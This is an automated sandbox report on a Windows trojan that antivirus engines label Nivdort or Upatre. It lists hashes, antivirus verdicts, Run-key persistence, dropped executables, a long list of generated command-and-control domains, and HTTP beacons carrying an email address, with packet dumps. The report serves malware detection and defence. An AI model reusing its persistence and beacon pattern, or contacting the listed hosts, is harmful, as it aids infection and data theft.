Analysis Date2015-07-29 04:55:35
MD59ffb9f08581716ab9754c6d60527ca36
SHA1b6e31e1875c2f5cd7a048cf909ced15b52579e41

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 66d069ca2e2c76f3f99747d7ad78acc4 sha1: 4fef505c8f516e96ec8709d551853f128ae6c8ef size: 300032
Section.rdata md5: 91dc4e30e5e4c1e0316163301a9a8f46 sha1: db8e3cdc34beaae4f780f3d5e459f5afc40cb13c size: 34304
Section.data md5: 02915f511ba1fce77995e3574591b014 sha1: 55bbe239b2071cceac826ef385e1d67fc2960012 size: 93696
Timestamp2014-10-30 09:51:36
PackerMicrosoft Visual C++ ?.?
PEhashb36f93beafae9716a4db7c4ea8394f3dc5b45db4
IMPhash71ae2e969df7fc166f638e08effd51a9
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. WebTrojan.DownLoader14.61837
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTSPY_NIVDORT.SMB
AVKasperskyTrojan.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusTrojan.FBAccountLock
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B2.gen!Eldorado
AVMalwareBytesTrojan.Zbot.WHE
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVK7no_virus
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Agent.VNC!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Kryptik-PJW [Trj]
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAvira (antivir)TR/ATRAPS.Gen2
AVMcafeeTrojan-FEMT!9FFB9F085817
AVRising0x57a70112

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Update PC Portable Input ➝
C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.ehf3d
Creates FileC:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wamybqu.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\kxnovjfiw\wqfinbaq.exe"

Network Details:

DNSknownstream.net
Type: A
74.208.56.10
DNSsummerstream.net
Type: A
66.96.132.53
DNScrowdstream.net
Type: A
184.168.221.61
DNScrowdnothing.net
Type: A
208.91.197.241
DNSthoughtstream.net
Type: A
50.63.202.54
DNSwaterstream.net
Type: A
91.198.165.243
DNSwaterbottle.net
Type: A
209.15.13.134
DNSfightstream.net
Type: A
184.168.221.32
DNSpartybottle.net
Type: A
91.215.216.53
DNSfreshbusiness.net
Type: A
72.52.4.120
DNSexperiencebusiness.net
Type: A
188.40.135.139
DNSsummerbusiness.net
Type: A
129.119.80.195
DNScrowdbusiness.net
Type: A
184.168.221.104
DNSsummerappear.net
Type: A
95.211.230.75
DNSmembernothing.net
Type: A
DNSfollowbottle.net
Type: A
DNSmemberbottle.net
Type: A
DNSfollowdivide.net
Type: A
DNSmemberdivide.net
Type: A
DNSbeginstream.net
Type: A
DNSbeginnothing.net
Type: A
DNSknownnothing.net
Type: A
DNSbeginbottle.net
Type: A
DNSknownbottle.net
Type: A
DNSbegindivide.net
Type: A
DNSknowndivide.net
Type: A
DNSsummernothing.net
Type: A
DNSsummerbottle.net
Type: A
DNScrowdbottle.net
Type: A
DNSsummerdivide.net
Type: A
DNScrowddivide.net
Type: A
DNSthoughtnothing.net
Type: A
DNSwaternothing.net
Type: A
DNSthoughtbottle.net
Type: A
DNSthoughtdivide.net
Type: A
DNSwaterdivide.net
Type: A
DNSwomanstream.net
Type: A
DNSsmokestream.net
Type: A
DNSwomannothing.net
Type: A
DNSsmokenothing.net
Type: A
DNSwomanbottle.net
Type: A
DNSsmokebottle.net
Type: A
DNSwomandivide.net
Type: A
DNSsmokedivide.net
Type: A
DNSpartystream.net
Type: A
DNSpartynothing.net
Type: A
DNSfightnothing.net
Type: A
DNSfightbottle.net
Type: A
DNSpartydivide.net
Type: A
DNSfightdivide.net
Type: A
DNSfreshmanner.net
Type: A
DNSexperiencemanner.net
Type: A
DNSfreshanother.net
Type: A
DNSexperienceanother.net
Type: A
DNSfreshappear.net
Type: A
DNSexperienceappear.net
Type: A
DNSgentlemanmanner.net
Type: A
DNSalreadymanner.net
Type: A
DNSgentlemananother.net
Type: A
DNSalreadyanother.net
Type: A
DNSgentlemanbusiness.net
Type: A
DNSalreadybusiness.net
Type: A
DNSgentlemanappear.net
Type: A
DNSalreadyappear.net
Type: A
DNSfollowmanner.net
Type: A
DNSmembermanner.net
Type: A
DNSfollowanother.net
Type: A
DNSmemberanother.net
Type: A
DNSfollowbusiness.net
Type: A
DNSmemberbusiness.net
Type: A
DNSfollowappear.net
Type: A
DNSmemberappear.net
Type: A
DNSbeginmanner.net
Type: A
DNSknownmanner.net
Type: A
DNSbeginanother.net
Type: A
DNSknownanother.net
Type: A
DNSbeginbusiness.net
Type: A
DNSknownbusiness.net
Type: A
DNSbeginappear.net
Type: A
DNSknownappear.net
Type: A
DNSsummermanner.net
Type: A
DNScrowdmanner.net
Type: A
DNSsummeranother.net
Type: A
DNScrowdanother.net
Type: A
DNScrowdappear.net
Type: A
HTTP GEThttp://knownstream.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://summerstream.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://crowdstream.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://crowdnothing.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://thoughtstream.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://waterstream.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://waterbottle.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://fightstream.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://partybottle.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://freshbusiness.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://experiencebusiness.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://summerbusiness.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://crowdbusiness.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
HTTP GEThttp://summerappear.net/index.php?email=sales5@furui-gifts.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 74.208.56.10:80
Flows TCP192.168.1.1:1032 ➝ 66.96.132.53:80
Flows TCP192.168.1.1:1033 ➝ 184.168.221.61:80
Flows TCP192.168.1.1:1034 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1035 ➝ 50.63.202.54:80
Flows TCP192.168.1.1:1036 ➝ 91.198.165.243:80
Flows TCP192.168.1.1:1037 ➝ 209.15.13.134:80
Flows TCP192.168.1.1:1038 ➝ 184.168.221.32:80
Flows TCP192.168.1.1:1039 ➝ 91.215.216.53:80
Flows TCP192.168.1.1:1040 ➝ 72.52.4.120:80
Flows TCP192.168.1.1:1041 ➝ 188.40.135.139:80
Flows TCP192.168.1.1:1042 ➝ 129.119.80.195:80
Flows TCP192.168.1.1:1043 ➝ 184.168.221.104:80
Flows TCP192.168.1.1:1044 ➝ 95.211.230.75:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 6b6e6f77   lose..Host: know
0x00000070 (00112)   6e737472 65616d2e 6e65740d 0a0d0a     nstream.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 73756d6d   lose..Host: summ
0x00000070 (00112)   65727374 7265616d 2e6e6574 0d0a0d0a   erstream.net....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 63726f77   lose..Host: crow
0x00000070 (00112)   64737472 65616d2e 6e65740d 0a0d0a0a   dstream.net.....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 63726f77   lose..Host: crow
0x00000070 (00112)   646e6f74 68696e67 2e6e6574 0d0a0d0a   dnothing.net....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 74686f75   lose..Host: thou
0x00000070 (00112)   67687473 74726561 6d2e6e65 740d0a0d   ghtstream.net...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 77617465   lose..Host: wate
0x00000070 (00112)   72737472 65616d2e 6e65740d 0a0d0a0d   rstream.net.....
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 77617465   lose..Host: wate
0x00000070 (00112)   72626f74 746c652e 6e65740d 0a0d0a0d   rbottle.net.....
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 66696768   lose..Host: figh
0x00000070 (00112)   74737472 65616d2e 6e65740d 0a0d0a0d   tstream.net.....
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 70617274   lose..Host: part
0x00000070 (00112)   79626f74 746c652e 6e65740d 0a0d0a0d   ybottle.net.....
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 66726573   lose..Host: fres
0x00000070 (00112)   68627573 696e6573 732e6e65 740d0a0d   hbusiness.net...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 65787065   lose..Host: expe
0x00000070 (00112)   7269656e 63656275 73696e65 73732e6e   riencebusiness.n
0x00000080 (00128)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 73756d6d   lose..Host: summ
0x00000070 (00112)   65726275 73696e65 73732e6e 65740d0a   erbusiness.net..
0x00000080 (00128)   0d0a0d0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 63726f77   lose..Host: crow
0x00000070 (00112)   64627573 696e6573 732e6e65 740d0a0d   dbusiness.net...
0x00000080 (00128)   0a0a0d0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65733540 66757275   mail=sales5@furu
0x00000020 (00032)   692d6769 6674732e 636f6d26 6d657468   i-gifts.com&meth
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 73756d6d   lose..Host: summ
0x00000070 (00112)   65726170 70656172 2e6e6574 0d0a0d0a   erappear.net....
0x00000080 (00128)   0a0a0d0a 0d0a                         ......


Strings